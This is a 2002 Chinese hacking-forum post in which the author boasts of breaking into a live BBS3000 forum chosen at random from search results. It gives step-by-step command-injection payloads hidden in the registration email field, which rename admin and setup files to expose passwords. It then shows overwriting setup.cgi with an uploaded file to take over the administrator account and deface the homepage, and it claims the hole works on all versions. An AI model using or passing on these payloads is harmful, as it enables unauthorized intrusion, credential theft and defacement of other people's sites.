温柔小刀 
级别:一般站友
威望:0
经验:0
货币:186
体力:
来源:61.184.68.*
总发帖数:19
注册日期:2002-06-12
|
|
 查看  邮件  主页  QQ  消息  引用  复制  下载
本文为技术文章,欢迎转贴,复制,转贴时请注明版权,有问题请和我联系,email:ctgu@hotmail.com
也可以到我的论坛www.3wcool.com/bbs讨论。
刚看完一篇关于cgi的解析机制的文章,发现了一些漏洞可能可以利用,就拿bbs3000开刀试试。
先上网搜索一个bbs3000的论坛,在google.com键入”bbs/list.cgi“,出来了一大堆,看到一个粘贴美女图的论坛很不爽,就拿你开刀。先注册一用户名为;字符,密码为空格,信箱为
rename "admin.cgi","readme.txt";#@3wcool.com
(这里假设admin为该论坛的社区区长,也就是该论坛最大权限的用户,readme.txt
为自己随便起的一个txt文件),然后我们在IE地址栏内输入:
http://x.x.x.x/bbs3000/yhzl/;.cgi
(x.x.x.x为该网站的域名,下同)
返回的页面显示
'F:\wwwroot\bbs3000\yhzl\;.cgi' script produced no output
后面的就是关键了,再输入这样
的看看
http://x.x.x.x/bbs3000/yhzl/readme.txt
返回的页面显示为
admin admin http://x.x.x.x 2002-04-16
显示的内容前面就是密码、用户
天啊,事情怎么那么容易呀!!~_*
再修改资料把信箱改成rename
"readme.txt","admin.cgi";#@3wcool.com
这样就可以用admin登入论坛了,之后你就可以,哈哈,不要扔我。
再跑的
http://x.x.x.x/bbs3000/cjyh.cgi输入用户admin,密码admin,我靠,居然不行,区长设置的管理密码和他的用户密码不一样。那好,我看你的setup.cgi里面的密码是什么。
再把我的油箱改成
rename "../setup.cgi","readme.cgi";#@3wcool.com
然后重复上面步骤在IE地址栏内输入:
http://x.x.x.x/bbs3000/yhzl/;.cgi
(x.x.x.x为该网站的域名,下同)
返回的页面显示
'F:\wwwroot\bbs3000\bbs3000\yhzl\;.cgi' script produced no
output 后面的就是关键了,再输入这样
的看看
http://x.x.x.x/bbs3000/yhzl/readme.txt
返回的页面显示为
$admname="admin";
$delpsd="admin123";
$imagurl="http://x.x.x.x/bbs/image";
$filepath="D:/wwwroot/cgi-bin/bbs";
$ImgDir="D:/wwwroot/bbs/image";
$ym="http://x.x.x.x/cgi-bin/bbs";
…………
……
则管理员帐号为admin,密码为admin123,返回登入管理界面,靠,现在是什么都不行了,因为论坛缺少了setup.cgi这个文件,所有的cgi都打不开了,拿了密码也没有用了。下线,等斑竹自己修复,我还要去背单词,要考试了。(可能你们要问为什么邮箱不用copy
"../setup.cgi","readme.cgi";#@3wcool.com,我试过,没用,可能是权限不够)
到了晚上再来看看论坛已经修好了,我不罢休换个思路再来。
我先发表了一篇文章,随便写点,肯定会被删的东西。然后用论坛上传文件的功能,上传了一个bbs3000原程序中的setup.cgi,自己定义好管理员帐号,密码;再改成的read.txt文件,因为后缀是cgi的文件,论坛不支持。发表后查看那个read.txt文件的路径为
http://x.x.x.x/bbs/image/affix/20010615135901.txt
好的,
抄出旧刀,把;的邮箱改成
rename
"../../bbs/20010615135901.txt","../setup.cgi";#@3wcool.com
然后在IE地址栏内输入:
http://x.x.x.x/bbs3000/yhzl/;.cgi
好,这下就可以用自己定义的帐号,密码登入管理界面了.
在狠一点,把邮箱改改,上传一个首页把它的首页更换掉。
哈,怎一个爽字了的。
心情好的时候,一口气背了100面单词…………
有几点值得注意的:
1:此漏洞对于目前发行的一切bbs3000版本都通吃。
2:此漏洞只存在与win2000的机子,且cgi是采用应用程序映射:perlIS.dll应用程序映射的,很多空间又支持asp又支持cgi的多为这种。
3:啊,怎么有人比我先注册了;这个用户名,看来已经背他洗劫过一次了,没有关系,换个用户名1;或2;只要最后是;的什么都行,什么斑竹把用户名含;过滤掉了,拿就随便注册一个把邮箱改成
;rename "admin.cgi","readme.txt";#@3wcool.com
前面加一个;号。
好了,告诉大家一句,擅自更改删除别人的数据为违法行为,请大家不要太过分。
by 温柔小刀
2002-6-12 |
首页 
小榕软件实验室 
刀光雪影 
我的一次入侵bbs3000取得最高权限 
将此页发给您的朋友
编辑
删除
发表于 2002-06-12.15:30:31 
IP: 
.gif)
.gif)
.gif)
.gif)
